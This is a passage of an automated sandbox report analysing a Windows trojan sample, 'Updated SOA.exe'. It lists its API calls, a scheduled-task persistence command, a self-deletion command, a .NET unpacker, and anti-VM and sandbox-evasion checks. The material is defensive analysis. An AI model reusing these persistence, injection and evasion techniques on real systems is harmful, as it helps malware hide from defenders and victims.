          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044198F0 NtReadVirtualMemory,18_2_044198F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044198A0 NtWriteVirtualMemory,18_2_044198A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419950 NtQueueApcThread,18_2_04419950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044199D0 NtCreateProcessEx,18_2_044199D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419A00 NtProtectVirtualMemory,18_2_04419A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419A10 NtQuerySection,18_2_04419A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419A20 NtResumeThread,18_2_04419A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419A80 NtOpenDirectoryObject,18_2_04419A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419B00 NtSetValueKey,18_2_04419B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0441A3B0 NtGetContextThread,18_2_0441A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_001385D0 NtCreateFile,18_2_001385D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00138680 NtReadFile,18_2_00138680
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00138700 NtClose,18_2_00138700
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_001387B0 NtAllocateVirtualMemory,18_2_001387B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_001385CA NtCreateFile,18_2_001385CA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00138623 NtReadFile,18_2_00138623
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013867A NtReadFile,18_2_0013867A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_001386FA NtClose,18_2_001386FA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_001387AA NtAllocateVirtualMemory,18_2_001387AA
          Source: Updated SOA.exe, 00000000.00000002.238611613.0000000000812000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTypeEnt.exe2 vs Updated SOA.exe
          Source: Updated SOA.exe, 00000000.00000002.242738068.0000000007390000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs Updated SOA.exe
          Source: Updated SOA.exe, 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnumerable.dlln' vs Updated SOA.exe
          Source: Updated SOA.exe, 00000007.00000002.300574008.00000000012FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Updated SOA.exe
          Source: Updated SOA.exe, 00000007.00000002.300276380.0000000000FD9000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs Updated SOA.exe
          Source: Updated SOA.exe, 00000007.00000000.237925676.0000000000582000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTypeEnt.exe2 vs Updated SOA.exe
          Source: Updated SOA.exeBinary or memory string: OriginalFilenameTypeEnt.exe2 vs Updated SOA.exe
          Source: Updated SOA.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: oydxFbGhGlh.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Updated SOA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: oydxFbGhGlh.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Updated SOA.exeVirustotal: Detection: 31%
          Source: Updated SOA.exeReversingLabs: Detection: 24%
          Source: C:\Users\user\Desktop\Updated SOA.exeFile read: C:\Users\user\Desktop\Updated SOA.exe
          Source: C:\Users\user\Desktop\Updated SOA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Updated SOA.exe 'C:\Users\user\Desktop\Updated SOA.exe'
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess created: C:\Users\user\Desktop\Updated SOA.exe C:\Users\user\Desktop\Updated SOA.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Updated SOA.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Updated SOA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Updated SOA.exeFile created: C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe
          Source: C:\Users\user\Desktop\Updated SOA.exeFile created: C:\Users\user\AppData\Local\Temp\tmp14E0.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@10/8
          Source: C:\Users\user\Desktop\Updated SOA.exeFile read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\Updated SOA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Updated SOA.exeMutant created: \Sessions\1\BaseNamedObjects\CKRUNQbnNejvlYEsYr
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Updated SOA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Updated SOA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Updated SOA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: Updated SOA.exe, 00000007.00000002.300264801.0000000000FD0000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: Updated SOA.exe, 00000007.00000002.300264801.0000000000FD0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Updated SOA.exe, 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, cmmon32.exe, 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Updated SOA.exe, cmmon32.exe

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: Updated SOA.exe, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: oydxFbGhGlh.exe.0.dr, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Updated SOA.exe.770000.0.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Updated SOA.exe.770000.0.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_0106E6B0 push eax; iretd 0_2_0106FEB1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041B87C push eax; ret 7_2_0041B882
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041B812 push eax; ret 7_2_0041B818
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041B81B push eax; ret 7_2_0041B882
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041CBE6 push dword ptr [2E339416h]; ret 7_2_0041CCB6
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041B7C5 push eax; ret 7_2_0041B818
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010CD0D1 push ecx; ret 7_2_010CD0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0442D0D1 push ecx; ret 18_2_0442D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013B812 push eax; ret 18_2_0013B818
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013B81B push eax; ret 18_2_0013B882
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013B87C push eax; ret 18_2_0013B882
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013CBE6 push dword ptr [2E339416h]; ret 18_2_0013CCB6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013B7C5 push eax; ret 18_2_0013B818
          Source: initial sampleStatic PE information: section name: .text entropy: 7.74077880888
          Source: Updated SOA.exe, oydxFbGhGlh.exe.0.dr, 0.0.Updated SOA.exe.770000.0.unpack, 0.2.Updated SOA.exe.770000.0.unpack: High entropy of concatenated method names
          Source: 0.2.Updated SOA.exe.770000.0.unpack, Imow1gKUOFLmaBVvLf/eSjr0pANSPdjGWVQhY.csHigh entropy of concatenated method names: 'ncsLGjLE7', 'j3wSZHav5', '.ctor', '.ctor', 'rJguWVZx4', 'ToString', 'OgY3y2dXf', '.cctor', 'x7LIayhLhvRCNMb4KO', 'c980ZSJn4jwW8RWmja'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, Ktk42cvwX2ewXGmd3b/bQxvDC9oymoWQnv1Zc.csHigh entropy of concatenated method names: 'AsUb45mhiy', 'BZlbh26DQ2', 'bUkbeixVvs', 'fmIbsK9iJi', 'BKDbJ2e9E1', 'pN2brgRYDf', 'YJVbn08UOn', 'tfPbvGyAkP', 'ICZbYumWZA', 'g8bbko1odd'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, oFHLGQXGbDEbjZmPcr/ehmTCsTM1ORrjiAcsS.csHigh entropy of concatenated method names: 'TJVt1cly5m', 'jpItg4nj8J', 'yyjtH2AZMZ', 'ofctB9KCF1', 'WmQtRRWAwW', 'DJWt6kBUBK', 'Wd9thLSZLN', '.ctor', 'ToString', '.cctor'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, XE1acXOZyHMH8O5TWH/qbV8XNw4frnrlJnkqt.csHigh entropy of concatenated method names: 'jYGzlbThX', 'FRCidd6PGt', 'Dawit5Dvvj', 'UZaiWXUncX', 'IvviA0WHyJ', 'cQUiKOClRG', 'WyYi2tGyf8', 'jBEiwO56w0', 'S5tiVQxvDC', 'QymiDoWQnv'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, idk1ttpl989afRHm6N/qKOGtJhglrIAuPGHLY.csHigh entropy of concatenated method names: '.ctor', 'zZIWyPKVYQ', 'gPxWgSphqx', 'Dispose', 'QnfWl12Riw', 'B6jvdXpSDUiBfwbPHUQ', 'EhjsT5pCovsESNVJEP8', 'FIdW1dpIOViyYYGGjAY', 'HncTJCpTPurkqR5x1kK', 'zoA3FLp4gB7Dxr48fIy'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.csHigh entropy of concatenated method names: '.ctor', 'dtxWZJx9Mi', 'dJKWkrR5u8', 'Connect', 'cHDWFCyXgr', 'VmxWuY1vxT', 'ITEW3w9V62', 'uolWLVMFI5', 'XobWSYt4Zp', 'RHEWx8gX8r'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, idk1ttpl989afRHm6N/qKOGtJhglrIAuPGHLY.csHigh entropy of concatenated method names: '.ctor', 'zZIWyPKVYQ', 'gPxWgSphqx', 'Dispose', 'QnfWl12Riw', 'B6jvdXpSDUiBfwbPHUQ', 'EhjsT5pCovsESNVJEP8', 'FIdW1dpIOViyYYGGjAY', 'HncTJCpTPurkqR5x1kK', 'zoA3FLp4gB7Dxr48fIy'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, YQ2KDc2aZEEah2yuwx/j1OnOAcbGyN30dtHtt.csHigh entropy of concatenated method names: 'Vxy8KOGtJ', 'rlrjIAuPG', '.ctor', 'yuRaJdrYl', 'XFAoOU2sq', 'BF0qWiitm', 'J30GMbOkm', 'XFmmrHl0i', 'Sa5UXWaQ4', 'asoIX9nyX'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, JqWuUybGmoYUMunIyM/YsjO2LWgmBAxJ4sEd8.csHigh entropy of concatenated method names: 'qHMlH8O5T', 'dHHBnyiqA', 'y3LfPUNax', 'coZ6sHLXe', 'IuPhK8Imt', 'U7NpuBhW8', 'M6rCRlcAh', 'STCssM1OR', 'l2KXDcaZE', 'YahH2yuwx'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, h4j3V11pFbKgZ1IrWX/O3UuHBHxm8cgV0dKKC.csHigh entropy of concatenated method names: '.ctor', 'x3EtnhpwDb', 'DrOt9WUiVA', 'Dispose', 'mgetvsql6k', 'Vbl1nupkkjj3aKLsnvE', 'vb7KTSppxZpb1vODQyR', 'oLMUogp5puC9vnH3xng', 'd1T3kepAl1Hw4xdeBmV', 'NVxhaop7n6984hXRGpl'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, Imow1gKUOFLmaBVvLf/eSjr0pANSPdjGWVQhY.csHigh entropy of concatenated method names: 'ncsLGjLE7', 'j3wSZHav5', '.ctor', '.ctor', 'rJguWVZx4', 'ToString', 'OgY3y2dXf', '.cctor', 'x7LIayhLhvRCNMb4KO', 'c980ZSJn4jwW8RWmja'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, Ktk42cvwX2ewXGmd3b/bQxvDC9oymoWQnv1Zc.csHigh entropy of concatenated method names: 'AsUb45mhiy', 'BZlbh26DQ2', 'bUkbeixVvs', 'fmIbsK9iJi', 'BKDbJ2e9E1', 'pN2brgRYDf', 'YJVbn08UOn', 'tfPbvGyAkP', 'ICZbYumWZA', 'g8bbko1odd'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, oFHLGQXGbDEbjZmPcr/ehmTCsTM1ORrjiAcsS.csHigh entropy of concatenated method names: 'TJVt1cly5m', 'jpItg4nj8J', 'yyjtH2AZMZ', 'ofctB9KCF1', 'WmQtRRWAwW', 'DJWt6kBUBK', 'Wd9thLSZLN', '.ctor', 'ToString', '.cctor'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, XE1acXOZyHMH8O5TWH/qbV8XNw4frnrlJnkqt.csHigh entropy of concatenated method names: 'jYGzlbThX', 'FRCidd6PGt', 'Dawit5Dvvj', 'UZaiWXUncX', 'IvviA0WHyJ', 'cQUiKOClRG', 'WyYi2tGyf8', 'jBEiwO56w0', 'S5tiVQxvDC', 'QymiDoWQnv'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.csHigh entropy of concatenated method names: '.ctor', 'dtxWZJx9Mi', 'dJKWkrR5u8', 'Connect', 'cHDWFCyXgr', 'VmxWuY1vxT', 'ITEW3w9V62', 'uolWLVMFI5', 'XobWSYt4Zp', 'RHEWx8gX8r'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, YQ2KDc2aZEEah2yuwx/j1OnOAcbGyN30dtHtt.csHigh entropy of concatenated method names: 'Vxy8KOGtJ', 'rlrjIAuPG', '.ctor', 'yuRaJdrYl', 'XFAoOU2sq', 'BF0qWiitm', 'J30GMbOkm', 'XFmmrHl0i', 'Sa5UXWaQ4', 'asoIX9nyX'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, JqWuUybGmoYUMunIyM/YsjO2LWgmBAxJ4sEd8.csHigh entropy of concatenated method names: 'qHMlH8O5T', 'dHHBnyiqA', 'y3LfPUNax', 'coZ6sHLXe', 'IuPhK8Imt', 'U7NpuBhW8', 'M6rCRlcAh', 'STCssM1OR', 'l2KXDcaZE', 'YahH2yuwx'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, idk1ttpl989afRHm6N/qKOGtJhglrIAuPGHLY.csHigh entropy of concatenated method names: '.ctor', 'zZIWyPKVYQ', 'gPxWgSphqx', 'Dispose', 'QnfWl12Riw', 'B6jvdXpSDUiBfwbPHUQ', 'EhjsT5pCovsESNVJEP8', 'FIdW1dpIOViyYYGGjAY', 'HncTJCpTPurkqR5x1kK', 'zoA3FLp4gB7Dxr48fIy'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, h4j3V11pFbKgZ1IrWX/O3UuHBHxm8cgV0dKKC.csHigh entropy of concatenated method names: '.ctor', 'x3EtnhpwDb', 'DrOt9WUiVA', 'Dispose', 'mgetvsql6k', 'Vbl1nupkkjj3aKLsnvE', 'vb7KTSppxZpb1vODQyR', 'oLMUogp5puC9vnH3xng', 'd1T3kepAl1Hw4xdeBmV', 'NVxhaop7n6984hXRGpl'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, Imow1gKUOFLmaBVvLf/eSjr0pANSPdjGWVQhY.csHigh entropy of concatenated method names: 'ncsLGjLE7', 'j3wSZHav5', '.ctor', '.ctor', 'rJguWVZx4', 'ToString', 'OgY3y2dXf', '.cctor', 'x7LIayhLhvRCNMb4KO', 'c980ZSJn4jwW8RWmja'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, oFHLGQXGbDEbjZmPcr/ehmTCsTM1ORrjiAcsS.csHigh entropy of concatenated method names: 'TJVt1cly5m', 'jpItg4nj8J', 'yyjtH2AZMZ', 'ofctB9KCF1', 'WmQtRRWAwW', 'DJWt6kBUBK', 'Wd9thLSZLN', '.ctor', 'ToString', '.cctor'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, Ktk42cvwX2ewXGmd3b/bQxvDC9oymoWQnv1Zc.csHigh entropy of concatenated method names: 'AsUb45mhiy', 'BZlbh26DQ2', 'bUkbeixVvs', 'fmIbsK9iJi', 'BKDbJ2e9E1', 'pN2brgRYDf', 'YJVbn08UOn', 'tfPbvGyAkP', 'ICZbYumWZA', 'g8bbko1odd'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, XE1acXOZyHMH8O5TWH/qbV8XNw4frnrlJnkqt.csHigh entropy of concatenated method names: 'jYGzlbThX', 'FRCidd6PGt', 'Dawit5Dvvj', 'UZaiWXUncX', 'IvviA0WHyJ', 'cQUiKOClRG', 'WyYi2tGyf8', 'jBEiwO56w0', 'S5tiVQxvDC', 'QymiDoWQnv'
          Source: C:\Users\user\Desktop\Updated SOA.exe, File created: C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\Updated SOA.exe, Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp'

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cmmon32.exe, Process created: /c del 'C:\Users\user\Desktop\Updated SOA.exe'
          Source: C:\Users\user\Desktop\Updated SOA.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match, File source: 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: Updated SOA.exe PID: 1380, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmp, Binary or memory string: SBIEDLL.DLL
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmp, Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Updated SOA.exe, RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Updated SOA.exe, RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe, RDTSC instruction interceptor: First address: 0000000000128614 second address: 000000000012861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe, RDTSC instruction interceptor: First address: 00000000001289AE second address: 00000000001289B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Updated SOA.exe TID: 4232, Thread sleep time: -35013s >= -30000s
          Source: C:\Users\user\Desktop\Updated SOA.exe TID: 2204, Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6760, Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6236, Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
          Source: C:\Windows\explorer.exe, Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exe, Last function: Thread delayed
          Source: C:\Users\user\Desktop\Updated SOA.exe, Code function: 7_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\Updated SOA.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Updated SOA.exe, Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Updated SOA.exe, Thread delayed: delay time: 35013
          Source: explorer.exe, 00000008.00000000.264365029.000000000871F000.00000004.00000001.sdmp, Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000008.00000000.264365029.000000000871F000.00000004.00000001.sdmp, Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmp, Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000008.00000000.263781825.0000000008640000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmp, Binary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.275013016.00000000055D0000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000008.00000000.264365029.000000000871F000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000008.00000000.264365029.000000000871F000.00000004.00000001.sdmp, Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000008.00000000.279684794.00000000087D1000.00000004.00000001.sdmp, Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000008.00000000.275053287.0000000005603000.00000004.00000001.sdmp, Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmp, Binary or memory string: VMware SVGA II
          Source: explorer.exe, 00000008.00000000.264365029.000000000871F000.00000004.00000001.sdmp, Binary or memory string: War&Prod_VMware_SATAJ
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmp, Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Updated SOA.exe, Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exe, Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Updated SOA.exe, Code function: 7_2_01079100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113131B mov eax, dword ptr fs:[00000030h]7_2_0113131B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107DB40 mov eax, dword ptr fs:[00000030h]7_2_0107DB40
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01148B58 mov eax, dword ptr fs:[00000030h]7_2_01148B58
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107F358 mov eax, dword ptr fs:[00000030h]7_2_0107F358
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107DB60 mov ecx, dword ptr fs:[00000030h]7_2_0107DB60
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A3B7A mov eax, dword ptr fs:[00000030h]7_2_010A3B7A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A3B7A mov eax, dword ptr fs:[00000030h]7_2_010A3B7A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A138B mov eax, dword ptr fs:[00000030h]7_2_010A138B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A138B mov eax, dword ptr fs:[00000030h]7_2_010A138B
